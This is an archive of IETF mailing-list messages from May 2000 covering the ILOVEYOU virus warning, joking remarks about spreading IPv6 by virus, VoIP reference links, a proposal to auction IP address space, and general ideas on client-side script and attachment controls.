Received: from mail.nanospace.com ([EMAIL PROTECTED] [209.213.199.10])
by ietf.org (8.9.1a/8.9.1a) with SMTP id CAA00616
for <[EMAIL PROTECTED]>; Mon, 8 May 2000 02:52:35 -0400 (EDT)
Received: (qmail 3943 invoked by uid 74); 8 May 2000 06:52:35 -0000
Received: from [EMAIL PROTECTED] by mail with scan4virus-0.19 (Clean. Processed in
1.718993 secs); 07/05/2000 23:52:33
Received: from ppp-209-213-195-59.nanospace.com (HELO zzsf220) (209.213.195.59)
by mail.nanospace.com with SMTP; 8 May 2000 06:52:33 -0000
Reply-To: <[EMAIL PROTECTED]>
From: "Jim Stephenson-Dunn" <[EMAIL PROTECTED]>
To: "'Lillian Komlossy'" <[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Subject: RE: VIRUS WARNING
Date: Sun, 7 May 2000 23:52:14 -0700
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 1 (Highest)
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)
Importance: High
In-Reply-To: <[EMAIL PROTECTED]>
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Sorry Lillian, Forgot to add the smiley !!! Did not intend to upset anybody
I actually use both systems, but prefer Unix ;->
Jim
-----Original Message-----
From: Lillian Komlossy [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 04, 2000 2:28 PM
To: Jim Dunn
Cc: '[EMAIL PROTECTED]'
Subject: RE: VIRUS WARNING
Let's not make it political. We've all been attacked, it is pointless
to bring in the Unix vs Windows debate. Office, Windows, Unix, Linux, Mac
are all great as long as somebody likes to work with them.
I personally like Microsoft products, but I respect those who don't - and
expect the same respect from them.
Lillian Komlossy
Site Manager
http://www.dmnews.com
http://www.imarketingnews.com
(212) 925-7300 ext. 232
-----Original Message-----
From: Jim Stephenson-Dunn [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 04, 2000 4:18 PM
To: 'A James Lewis'; 'Lillian Komlossy'
Cc: [EMAIL PROTECTED]
Subject: RE: VIRUS WARNING
Office for Unix, Now there's a terrifying thought !!!!
(please don't contaminate the purity of my unix system with that filthy
windows software)
Jim
Jim Dunn
Senior Network Engineer
San Francisco NOC
-----Original Message-----
From: A James Lewis [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 04, 2000 11:53 AM
To: Lillian Komlossy
Cc: '[EMAIL PROTECTED]'
Subject: RE: VIRUS WARNING
The whole world will use what they are presented with.... the difference
between Win3.1 and Win95 is far greater than the difference between Win95
and GNOME or KDE... so actually it's only software availability thats
holding back IS departments the world over!
If MS gets split, we could have Office for UNIX sooner rather than
later too!
On Thu, 4 May 2000, Lillian Komlossy wrote:
> Donald,
>
> The whole world will not switch over to Unix
> - the average user will always be more confortable with Windows
> unless Unix will at one point offer the same seamless user-friendliness.
> So it will always be a problem, one which cannot be solved by telling
> others not to use what they've accustomed to - and one which cannot be
> ignored.
>
>
> Lillian Komlossy
> Site Manager
> http://www.dmnews.com
> http://www.imarketingnews.com
> (212) 925-7300 ext. 232
>
>
> -----Original Message-----
> From: Donald E. Eastlake 3rd [mailto:[EMAIL PROTECTED]]
> Sent: Thursday, May 04, 2000 10:48 AM
> To: [EMAIL PROTECTED]
> Subject: Re: VIRUS WARNING
>
>
>
> The whole world does not run software which is a good culture medium
> for email viruses. I mostly use nice old UNIX software and it would
> take a number of extra steps on my part for some embdedded virus to
> get a chance to run. If your software automatically executes stuff
> in attachments, you need to change your software, not develope a list
> of subject lines you are freightened of.
>
> Donald
>
> From: "Scot Mc Pherson" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>, <[EMAIL PROTECTED]>
> Date: Thu, 4 May 2000 09:27:19 -0400
> Message-ID: <00cf01bfb5cc$79bc4280$[EMAIL PROTECTED]>
> Content-Type: text/plain;
> charset="iso-8859-1"
> Content-Transfer-Encoding: 7bit
> X-MSMail-Priority: Normal
> X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
> Importance: Normal
> In-Reply-To: <[EMAIL PROTECTED]>
> Content-Transfer-Encoding: 7bit
> X-Loop: [EMAIL PROTECTED]
> Content-Transfer-Encoding: 7bit
> >The is an e-mail virus going around. The subject of the e-mail is
> >ILOVEYOU...I suggest you delete it the moment you receive it.
> >
> >-Scot Mc Pherson, N2UPA
> >-Sr. Network Analyst
> >-ClearAccess Communications
> >-Ph: 941.744.5757 ext. 210
> >-Fax: 941.744.0629
> >-mailto:[EMAIL PROTECTED]
> >-http://www.clearaccess.net
> >
>
A. James Lewis ([EMAIL PROTECTED])
Don't throw your computers out of the windows,
throw the Windows(tm) out of your computers.
>From owner-ietf-outbound Mon May 8 05:10:26 2000
Received: by ietf.org (8.9.1a/8.9.1a) id FAA01552
for [EMAIL PROTECTED]; Mon, 8 May 2000 05:10:02 -0400 (EDT)
Received: from jake.akitanet.co.uk (jake.akitanet.co.uk [212.1.130.131])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id FAA01529
for <[EMAIL PROTECTED]>; Mon, 8 May 2000 05:08:58 -0400 (EDT)
Received: from ppp-12b-203.3com.telinco.net ([212.159.151.203] helo=akitanet.co.uk)
by jake.akitanet.co.uk with esmtp (Exim 3.13 #3)
id 12ojWt-000ADs-00; Mon, 08 May 2000 10:08:43 +0100
Message-ID: <[EMAIL PROTECTED]>
Date: Mon, 08 May 2000 10:10:30 +0100
From: Paul Robinson <[EMAIL PROTECTED]>
Organization: Akitanet
X-Mailer: Mozilla 4.7 [en]C-CCK-MCD (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: Tripp Lilley <[EMAIL PROTECTED]>
CC: Keith Moore <[EMAIL PROTECTED]>, Greg Skinner <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Subject: Re: IPv6: Past mistakes repeated?
References: <[EMAIL PROTECTED]>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Tripp Lilley wrote:
> We came up with a wacky idea here yesterday at Interop... Why not
> accelerate v6 deployment by writing a virus that will upgrade
> end-stations' stacks? :)
Even better, why doesn't the IETF employ a bunch of people dressed in
black suits and wearing sun glasses to go around and 'enforce' IPv6...
not as subtle I know, but administrators have this stupid habit of
deleting viruses once they know what's going on, in the foolish belief
that they know what is best! Pah!
By sending a bunch of heavies around various Network Operations and Data
Operations Centers, we can ensure the quickest possible roll-out of IPv6
under the threat of 'Big Billy' getting 'a bit wild with the baseball
bat, right?' sort-of-thing. I'm sure over here in the UK we can
contribute a few East-London types to help everything along nicely...
> That will give us the pervasive deployment needed to convince the ISPs to
> upgrade the core. The "upgrade" that the virus propagates can do
> gratuitous tunneling until it discovers that the infrastructure between it
> and the rest of the world has been upgraded.
Indeed, your solution would get right down to the end user ultimately,
which our lads would not be able to do necessarily, but if your ISP
phoned you up and told you that you had to upgrade to IPv6 'or else' you
would, wouldn't you?
This would also help us in gaining all sorts of blackmail material about
various administrators and senior managment of various ISPs used to put
a little pressure on them, but would also give the IETF an additional
revenue stream, and could potnetially ensure that even Microsoft started
following the 'standard line'...
> (yes, any such toy would need to include a raft of known exploits for
> various Unices, so we can include them in the "upgrade") :)
No! We don't want to fix the holes! We want to keep a record of them
without telling the admins, and when they misbehave, not only can we pop
their kneecaps, set fire to their house, release information to their
families they wouldn't want to be released, but also as a grand finale,
we can take control of the machine and do what we wanted anyway.
Eventually, we as the IETF would have complete control of every machine
connected to the Internet, thereby giving us control of the entire
planet, which in turn would allow us to park wherever we wanted and
*not*get*a*ticket*!!!!!! :-)
--
Paul Robinson - Developer/Sys Admin @ Akitanet http://www.akitanet.co.uk
------------------------------------------------------------------------
Sales: T:+44 (0)1869 337088 F:+44 (0)1869 337488 E:[EMAIL PROTECTED]
Techs: T:+44 (0)161 228 6388 F:+44 (0)161 228 6387 E:[EMAIL PROTECTED]
------------------------------------------------------------------------
>From owner-ietf-outbound Mon May 8 05:50:09 2000
Received: by ietf.org (8.9.1a/8.9.1a) id FAA01817
for [EMAIL PROTECTED]; Mon, 8 May 2000 05:50:02 -0400 (EDT)
Received: from bells.cs.ucl.ac.uk (bells.cs.ucl.ac.uk [128.16.5.31])
by ietf.org (8.9.1a/8.9.1a) with SMTP id FAA01781
for <[EMAIL PROTECTED]>; Mon, 8 May 2000 05:47:45 -0400 (EDT)
Received: from sonic.cs.ucl.ac.uk by bells.cs.ucl.ac.uk with local SMTP
id <[EMAIL PROTECTED]>; Mon, 8 May 2000 10:47:06 +0100
To: Paul Robinson <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED]
Subject: Re: IPv6: Past mistakes repeated?
In-reply-to: Your message of "Mon, 08 May 2000 10:10:30 BST."
<[EMAIL PROTECTED]>
Date: Mon, 08 May 2000 10:47:03 +0100
Message-ID: <[EMAIL PROTECTED]>
From: Jon Crowcroft <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
In message <[EMAIL PROTECTED]>, Paul Robinson typed:
>>Even better, why doesn't the IETF employ a bunch of people dressed in
>>black suits and wearing sun glasses to go around and 'enforce' IPv6...
we do, but you keep forgetting.
:-)
j. iab member, and official "man in black"
>From owner-ietf-outbound Mon May 8 06:10:17 2000
Received: by ietf.org (8.9.1a/8.9.1a) id GAA02106
for [EMAIL PROTECTED]; Mon, 8 May 2000 06:10:02 -0400 (EDT)
Received: from ausmtp02.au.ibm.com (ausmtp02.au.ibm.COM [202.135.136.105])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id GAA01953
for <[EMAIL PROTECTED]>; Mon, 8 May 2000 06:00:01 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from f03n05e.au.ibm.com
by ausmtp02.au.ibm.com (IBM AP 1.0) with ESMTP id TAA151394
for <[EMAIL PROTECTED]>; Mon, 8 May 2000 19:54:26 +1000
Received: from d73mta05.au.ibm.com (f06n05s [9.185.166.67])
by f03n05e.au.ibm.com (8.8.8m2/8.8.7) with SMTP id TAA72954
for <[EMAIL PROTECTED]>; Mon, 8 May 2000 19:59:25 +1000
Received: by d73mta05.au.ibm.com(Lotus SMTP MTA v4.6.5 (863.2 5-20-1999)) id
CA2568D9.0036DCCE ; Mon, 8 May 2000 19:59:14 +1000
X-Lotus-FromDomain: IBMAU@IBMIN@IBMAU
To: [EMAIL PROTECTED]
Message-ID: <[EMAIL PROTECTED]>
Date: Mon, 8 May 2000 14:10:11 +0530
Subject: RE: Information on Voice Over IP
Mime-Version: 1.0
Content-type: multipart/mixed;
Boundary="0__=WsENtVzNmAm8ByaYmFGGvXaTWROaL8WjAxSsJWlhT30xoRbw4J7jzkbZ"
Content-Disposition: inline
X-Loop: [EMAIL PROTECTED]
--0__=WsENtVzNmAm8ByaYmFGGvXaTWROaL8WjAxSsJWlhT30xoRbw4J7jzkbZ
Content-type: text/plain; charset=us-ascii
Content-Disposition: inline
here you are
http://www.fokus.gmd.de/research/cc/glone/projects/ipt/
http://www.tsufl.edu/williams/Projects/InternetPhone/TSCIS445.htm
http://www.cis.ohio-state.edu/~jain/refs/ref_voip.htm
-----Original Message-----
From: Sarika Gupta [mailto:[EMAIL PROTECTED]]
Sent: jeudi 9 mars 2000 07:36
To: [EMAIL PROTECTED]
Subject: Information on Voice Over IP
Dear Sirs and Madams,
I need information on Voice over IP for one of the technical papers
which I'll be presenting. Could anyone point to really good sites for
that?
Thanks & regds,
Sarika
--0__=WsENtVzNmAm8ByaYmFGGvXaTWROaL8WjAxSsJWlhT30xoRbw4J7jzkbZ
Content-type: text/html;
name="att1.htm"
Content-Disposition: attachment; filename="att1.htm"
Content-Description: Internet HTML
Content-Transfer-Encoding: base64
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDMuMi8vRU4iPg0KPEhUTUw+
DQo8SEVBRD4NCjxNRVRBIEhUVFAtRVFVSVY9IkNvbnRlbnQtVHlwZSIgQ09OVEVOVD0idGV4dC9o
dG1sOyBjaGFyc2V0PVVTLUFTQ0lJIj4NCjxNRVRBIE5BTUU9IkdlbmVyYXRvciIgQ09OVEVOVD0i
TVMgRXhjaGFuZ2UgU2VydmVyIHZlcnNpb24gNS41LjE5NjAuMyI+DQo8VElUTEU+UkU6IEluZm9y
bWF0aW9uIG9uIFZvaWNlIE92ZXIgSVA8L1RJVExFPg0KPC9IRUFEPg0KPEJPRFk+DQoNCjxQPjxG
T05UIFNJWkU9Mj5oZXJlIHlvdSBhcmU8L0ZPTlQ+DQo8L1A+DQoNCjxQPiZuYnNwOyZuYnNwOyZu
YnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyAmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJz
cDsgPEZPTlQgU0laRT0yPjxBIEhSRUY9Imh0dHA6Ly93d3cuZm9rdXMuZ21kLmRlL3Jlc2VhcmNo
L2NjL2dsb25lL3Byb2plY3RzL2lwdC8iIFRBUkdFVD0iX2JsYW5rIj5odHRwOi8vd3d3LmZva3Vz
LmdtZC5kZS9yZXNlYXJjaC9jYy9nbG9uZS9wcm9qZWN0cy9pcHQvPC9BPjwvRk9OVD48L1A+DQoN
CjxQPiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyAmbmJzcDsmbmJz
cDsmbmJzcDsmbmJzcDsmbmJzcDsgPEZPTlQgU0laRT0yPjxBIEhSRUY9Imh0dHA6Ly93d3cudHN1
ZmwuZWR1L3dpbGxpYW1zL1Byb2plY3RzL0ludGVybmV0UGhvbmUvVFNDSVM0NDUuaHRtIiBUQVJH
RVQ9Il9ibGFuayI+aHR0cDovL3d3dy50c3VmbC5lZHUvd2lsbGlhbXMvUHJvamVjdHMvSW50ZXJu
ZXRQaG9uZS9UU0NJUzQ0NS5odG08L0E+PC9GT05UPjwvUD4NCg0KPFA+Jm5ic3A7Jm5ic3A7Jm5i
c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7ICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNw
OyA8Rk9OVCBTSVpFPTI+PEEgSFJFRj0iaHR0cDovL3d3dy5jaXMub2hpby1zdGF0ZS5lZHUvfmph
aW4vcmVmcy9yZWZfdm9pcC5odG0iIFRBUkdFVD0iX2JsYW5rIj5odHRwOi8vd3d3LmNpcy5vaGlv
LXN0YXRlLmVkdS9+amFpbi9yZWZzL3JlZl92b2lwLmh0bTwvQT4mbmJzcDsmbmJzcDsmbmJzcDsm
bmJzcDsmbmJzcDsmbmJzcDsgJm5ic3A7IDwvRk9OVD48L1A+DQoNCjxQPjxGT05UIFNJWkU9Mj4t
LS0tLU9yaWdpbmFsIE1lc3NhZ2UtLS0tLTwvRk9OVD4NCjxCUj48Rk9OVCBTSVpFPTI+RnJvbTog
U2FyaWthIEd1cHRhIFs8QSBIUkVGPSJtYWlsdG86c2FyZ3VwdGFAY2lzY28uY29tIiBUQVJHRVQ9
Il9ibGFuayI+bWFpbHRvOnNhcmd1cHRhQGNpc2NvLmNvbTwvQT5dPC9GT05UPg0KPEJSPjxGT05U
IFNJWkU9Mj5TZW50OiBqZXVkaSA5IG1hcnMgMjAwMCAwNzozNjwvRk9OVD4NCjxCUj48Rk9OVCBT
SVpFPTI+VG86IGlldGZAaWV0Zi5vcmc8L0ZPTlQ+DQo8QlI+PEZPTlQgU0laRT0yPlN1YmplY3Q6
IEluZm9ybWF0aW9uIG9uIFZvaWNlIE92ZXIgSVA8L0ZPTlQ+DQo8L1A+DQo8QlI+DQoNCjxQPjxG
T05UIFNJWkU9Mj5EZWFyIFNpcnMgYW5kIE1hZGFtcyw8L0ZPTlQ+DQo8L1A+DQoNCjxQPjxGT05U
IFNJWkU9Mj5JIG5lZWQgaW5mb3JtYXRpb24gb24gVm9pY2Ugb3ZlciBJUCBmb3Igb25lIG9mIHRo
ZSB0ZWNobmljYWwgcGFwZXJzPC9GT05UPg0KPEJSPjxGT05UIFNJWkU9Mj53aGljaCBJJ2xsIGJl
IHByZXNlbnRpbmcuIENvdWxkIGFueW9uZSBwb2ludCB0byByZWFsbHkgZ29vZCBzaXRlcyBmb3I8
L0ZPTlQ+DQo8QlI+PEZPTlQgU0laRT0yPnRoYXQ/PC9GT05UPg0KPC9QPg0KPEJSPg0KDQo8UD48
Rk9OVCBTSVpFPTI+VGhhbmtzICZhbXA7IHJlZ2RzLDwvRk9OVD4NCjxCUj48Rk9OVCBTSVpFPTI+
U2FyaWthPC9GT05UPg0KPC9QPg0KDQo8L0JPRFk+DQo8L0hUTUw+
--0__=WsENtVzNmAm8ByaYmFGGvXaTWROaL8WjAxSsJWlhT30xoRbw4J7jzkbZ--
>From owner-ietf-outbound Mon May 8 06:20:16 2000
Received: by ietf.org (8.9.1a/8.9.1a) id GAA02278
for [EMAIL PROTECTED]; Mon, 8 May 2000 06:20:02 -0400 (EDT)
Received: from ausmtp02.au.ibm.com (ausmtp02.au.ibm.COM [202.135.136.105])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id GAA01959
for <[EMAIL PROTECTED]>; Mon, 8 May 2000 06:00:14 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from f03n05e.au.ibm.com
by ausmtp02.au.ibm.com (IBM AP 1.0) with ESMTP id TAA113842;
Mon, 8 May 2000 19:54:35 +1000
Received: from d73mta05.au.ibm.com (f06n05s [9.185.166.67])
by f03n05e.au.ibm.com (8.8.8m2/8.8.7) with SMTP id TAA57530;
Mon, 8 May 2000 19:59:34 +1000
Received: by d73mta05.au.ibm.com(Lotus SMTP MTA v4.6.5 (863.2 5-20-1999)) id
CA2568D9.0036E25F ; Mon, 8 May 2000 19:59:28 +1000
X-Lotus-FromDomain: IBMAU@IBMIN@IBMAU
To: Michael Stilmant <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED]
Message-ID: <[EMAIL PROTECTED]>
Date: Mon, 8 May 2000 14:10:11 +0530
Subject: Re: Information on Voice Over IP
Mime-Version: 1.0
Content-type: text/plain; charset=us-ascii
Content-Disposition: inline
X-Loop: [EMAIL PROTECTED]
> Michael Stilmant wrote:
>
> here you are
>
> http://www.fokus.gmd.de/research/cc/glone/projects/ipt/
>
>
> http://www.tsufl.edu/williams/Projects/InternetPhone/TSCIS445.htm
>
>
> http://www.cis.ohio-state.edu/~jain/refs/ref_voip.htm
>
See also http://www.cs.columbia.edu/sip
http://www.cs.columbia.edu/~hgs/internet
--
Henning Schulzrinne http://www.cs.columbia.edu/~hgs
>From owner-ietf-outbound Mon May 8 07:00:11 2000
Received: by ietf.org (8.9.1a/8.9.1a) id HAA03203
for [EMAIL PROTECTED]; Mon, 8 May 2000 07:00:02 -0400 (EDT)
Received: from mail2.rdc3.on.home.com (mail2.rdc3.on.home.com [24.2.9.41])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id GAA03012
for <[EMAIL PROTECTED]>; Mon, 8 May 2000 06:53:52 -0400 (EDT)
Received: from intruder ([24.114.219.42]) by mail2.rdc3.on.home.com
(InterMail vM.4.01.02.00 201-229-116) with SMTP
id <20000508105346.BFRV413.mail2.rdc3.on.home.com@intruder>;
Mon, 8 May 2000 03:53:46 -0700
From: Garreth Jeremiah <[EMAIL PROTECTED]>
Reply-To: [EMAIL PROTECTED]
To: "James P. Salsman" <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Subject: Re: contest: win valuable Microsoft stock!
Date: Mon, 8 May 2000 06:38:06 -0400
X-Mailer: KMail [version 1.0.29]
Content-Type: text/plain
References: <[EMAIL PROTECTED]>
In-Reply-To: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Message-Id: <00050806544401.13566@intruder>
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by ietf.org id GAA03012
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 8bit
On Mon, 08 May 2000, James P. Salsman wrote:
> Keith Moore wrote:
>
> >... I do think there is some culpability on the part of the
> > software vendor. and from a purely pragmatic perspective, it's a
> > lot easier for the vendor to make software that is less susceptible
> > to such things, than it is to get rid of the virus writers.
> >
> > and if the folks who sell such software would just fix this, we
> > wouldn't need to care so much about culpability. but I'm not
> > holding my breath waiting for this to happen.
I think the issue is one of bounds. What is off bounds and what is ok for an
internet client, such as an email reader, to have access to on any system. If
the requirements of these bounds could be clearly defined in temrs of what is
allowed, then by default dissalow access to everything else. Do not make this
a configurable option. We have to remember that he who giveth CANNOT taketh
away, so we must ensure that the flexability of scripting languages remains (
although I'd love to shut down their access ) as some people are now reliant on
certain functionality.
The "Java" sandbox idea in my mind is a great one. When code is run from an
internet client, constant bounds checking must occur. Whenever the code steps
over the mark we either stop it in it's tracks, clean up and offer to send a
potential virus alert, or we thow some alarm hoping that the user is actually
able to read and understand the potential dangers.
The core issue is certainly not a new one, however it is wearing a different
hat. Attempting to get programming teams to impliment security, such as bounds
checking, input validation ( not just "is it a number etc. ) and various other
forms of development/coding technices is nothing new. It is here however that
we must focus our attentions. It is the fault directly, of the designers of
the software. It is these designers that think almost solely about the
functionality of the code rather than necessary robustness and security. Once
the designers have been - re-aligned - it is the turn of the programmers. To
educatie them in the kinds of attacks people are perpetrating through their
code and how they should be writing code to avoid this. For both parties, the
process of peer revies is important. This peer revieew is where I have
personally found a good deal of discovery occurs. Certain nuances taat one
persone may overlook another may not.
In summary. Re-education for designers and programmers. Peer review. Require
solid definitions for what an internet client can do. On execution of internet
based code, bounds checking must occur constantly. Bounds execption actions
must be agreed, defined and predictable.
Garreth J Jeremiah,
"If the light is on, but no one is home.......we simply left the light on"
"The light at the end of the tunnel could be a train"
>From owner-ietf-outbound Mon May 8 08:50:19 2000
Received: by ietf.org (8.9.1a/8.9.1a) id IAA06355
for [EMAIL PROTECTED]; Mon, 8 May 2000 08:50:02 -0400 (EDT)
Received: from sean.ebone.net (IDENT:[EMAIL PROTECTED] [195.158.227.211])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id IAA06243
for <[EMAIL PROTECTED]>; Mon, 8 May 2000 08:43:39 -0400 (EDT)
Received: by sean.ebone.net (Postfix, from userid 1113)
id DE106875; Mon, 8 May 2000 14:43:38 +0200 (CEST)
To: Bill Manning <[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED]
Subject: PIARA (IP address space economics)
References: <[EMAIL PROTECTED]>
From: Sean Doran <[EMAIL PROTECTED]>
Date: 08 May 2000 14:43:38 +0200
In-Reply-To: Bill Manning's message of "Sun, 7 May 2000 18:10:11 -0700 (PDT)"
Message-ID: <[EMAIL PROTECTED]>
Lines: 105
User-Agent: Gnus/5.0805 (Gnus v5.8.5) Emacs/20.6
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Loop: [EMAIL PROTECTED]
Bill Manning <[EMAIL PROTECTED]> writes:
> There is near zero value in the number/address and
> very real value in the routing slot. Perhaps it is best
> to simply have ebone route filter on the /16 boundaries
> to drive home your point. (being cranky this morning)
Bill -
I utterly reject your ostrich-like position on this matter.
I would be extremely happy if I could make a money-based
or (better still) capacity-based offer to one of the R&E
networks or institutions which retain very short prefixes
(historically known as Class A and Class B networks),
without being prevented from engaging in such a private
transaction by the collusive behaviour of IANA and the registries.
Likewise, I think that government agencies in various East
and South Asian countries, and perhaps various Asian ISPs
or next-generation mobile telephony organizations
would be extremely happy to bid for a few historical Class As
now being under-used by the current registrants, rather
than being told "no" or "first demonstrate usage" by APNIC.
It has been made clear in the past that any transfer of
addresses will be reviewed by a registry, and that if the
ultimate recipient of transferred address space wants
more address space from the registry, they must comply
with the ordinary "growth & design" rules.
I hear anecdotally that the threat of a withholding of new
allocations to the selling party has also been made in the past.
This is a system which enforces a "one-seller" (the IANA),
"one buyer" (one may return addresses to IANA only) model,
which flies in the face of free markets, and perversely
imposes costs upon consumers.
Although I am happy that there are people trying to
conserve IPv4 addresses and also encourage sensible
routing announcements by providing not less than a
sizeable aggregatable range to qualified buyers, the
qualification process is tricky and gets trickier as
one's business grows.
There is a VERY real cost -- most notably in terms of time --
to using the "growth & design" scheme for acquiring more addresses
than an initial allocation. This has, in fact, slowed the
deployment of independently-routed subnets owned and
operated by a single organization. This slowness could
have been avoided if a market for IP addresses existed,
and I can assure you that a fairly sizable amount of money
would have been spent to speed up the process of acquiring
a handful of relatively long prefixes. I am also aware
of anecdotal reports of organizations who had to suspend
turning up newly-acquired customers because they could not
quickly acquire new addresses from the monopoly vendors:
the local registries and IANA.
In my opinion, following the PIARA work, the appropriate
thing for IANA to do is to spin off its IPv4 address
allocation function. We will call this spin-off IANA-I.
IANA-I should then proceed auction off the *ENTIRE*
_not-yet-allocated_ address space, being very clear that
what is sold at auction is merely an exclusive
registration of a range of IP addresses in an
IANA-maintained and publically-accessible document, the
right to make future changes to the registration, and the
right to transfer future registration change rights to
another party.
The IANA-I or its agents could certainly charge a small fee
for processing such changes from persons duly authorized
by the registrant the IANA knows, however it should not
have the power to refuse any transfers of title.
I would furthermore like to see the ENTIRE unallocated
IPv6 global unicast space auctioned off in a similar manner,
abandoning the anti-market "one-seller" model put forward
in RFC 2450 section 5.0, using the monopoly tariff put
forward in section 5.2 ibidem.
That ISPs probably cannot be compelled to consider the
IANA-I registration document at all, in whole or in part,
when configuring their networks' routing policies, should
be declared by the IANA and its auctioneer agent, much as
the registries note this now when making allocations under
the current "one-seller" rules. Whether there is value in
such a risk-bearing instrument,however, MUST be determined
by buyers, not by IANA, IANA-I, or ivory-tower academics.
There are certainly MUCH riskier instruments traded
regularly as assets on exchange markets throughout the
financial world. Moreover, the IPv4 black market that
DOES exist, as noted by David Conrad, argues strongly in
favour of testing the "white market" in a sensible fashion.
Finally, a small initial registration fee by IANA-I could
allow currently allocated address space could be noted
in the IANA-I registration document, thus normalizing the
"deed" to the range of addresses, likely making it easier
to undertake a transfer.
Sean.
>From owner-ietf-outbound Mon May 8 09:10:08 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA06746
for [EMAIL PROTECTED]; Mon, 8 May 2000 09:10:02 -0400 (EDT)
Received: from ernst.netinsight.se (ernst.netinsight.se [194.16.221.130])
by ietf.org (8.9.1a/8.9.1a) with SMTP id JAA06654
for <[EMAIL PROTECTED]>; Mon, 8 May 2000 09:05:40 -0400 (EDT)
Received: from localhost (unverified [10.100.1.11]) by ernst.netinsight.se
(EMWAC SMTPRS 0.83) with SMTP id <[EMAIL PROTECTED]>;
Mon, 08 May 2000 15:04:47 +0200
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
In-Reply-To: <v0421010eb53b3e500a1b@[130.237.150.138]>
References: <[EMAIL PROTECTED]>
<v0421010eb53b3e500a1b@[130.237.150.138]>
X-Mailer: Mew version 1.94.1 on Emacs 20.4 / Mule 4.0 (HANANOEN)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <[EMAIL PROTECTED]>
Date: Mon, 08 May 2000 15:05:00 +0200
From: Magnus Danielson <[EMAIL PROTECTED]>
X-Dispatcher: imput version 991025(IM133)
Lines: 84
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
From: Jacob Palme <[EMAIL PROTECTED]>
Subject: Re: VIRUS WARNING
Date: Sun, 7 May 2000 17:55:19 +0200
Jacob,
Sorry for stepping slightly out of the topic you are discussing,
> At 11.17 -0400 0-05-07, Keith Moore wrote:
> > in my mind the people most responsible for the viruses are those who
> > built systems that were so easily compromised.
> >
> > we don't need protocol support to track them down.
>
> That is certainly one factor of importance. But even the
> best systems can be compromised, and crimes directly using
> the Internet, such as ping overloads, mail bombing, using
> vulnerabilities like buffer overlow, etc., do occur. Also,
> designing systems which are more safe from viruses may be
> systems which are less user-friendly. For example, I have
> set my MS Office programs to always ask me before running a
> macro in an unkown file in it. The advantage is less risk for
> viruses, but the disadvantage is that I have to OK those
> questions from MS Office of whether to accept macros. And
> if they occur too open, there is a risk that I click "yes"
> before thinking through the risk of doing this.
What you really would like to have is a common accept/deny type of list.
This would trim down the required OK's quite alot. Those which are on the deny
list would be silently denied and those on the accept list would be silently
accepted. Only those not existing on either of the lists would actually require
manual intervention in approving.
While I may not normally want say Javascripts enabled (and I usually *dont*)
I do want this for some services, like my Internet bank, ordering of books or
other day-to-day activities. Also, I normally is not interested in any
Javascripts pushed in my face during normal surfing since most of the time it
is just annoying in my mind, but that is my view and my preference.
So, by having an accept/deny list in the client side you are able to trim the
settings more finegrainly. The downside to this is that way to many users
rarely changes anything once the system is up and they will most probably set
things to allow as much as possible to happend as a default.
In my mind there is still a lot of things to do in the client side which is not
particularly smart, not particularly safe but may raise the bar sufficiently
for the kind of attack we are discussing. It does nothing to save us from all
other forms of attack.
Also, for mail-lists one should really consider wiether it is a goot thing to
allow all sort of attachments to be sent by anyone. Passing a script or other
executable info along with the mail is good for some, but not all need it in
order to write and read email. There is even lists where passing GIF or JPEGs
is not allowed, and the mail server could be configured to blcok these mails.
This is also a very rought tool, but could also save lives in these situations
since email-lists is really a high-price hit for this kind of attack. This
form of blocking should probably also be controled using accept/deny lists,
since there may very well be a group of people which have a legal reason to
pass material around (such as patches, Word documents etc).
> I do not know about the laws in the U.S.A., but in my
> country, Sweden, police are allowed to perform wiretapping
> and electronic eavesdropping only by decision of a court,
> and only when there is reason to believe the someone has
> committed a crime with a penalty of at least two years in
> prison.
Actually, in order to wiretap you first of all must be the Swedish police,
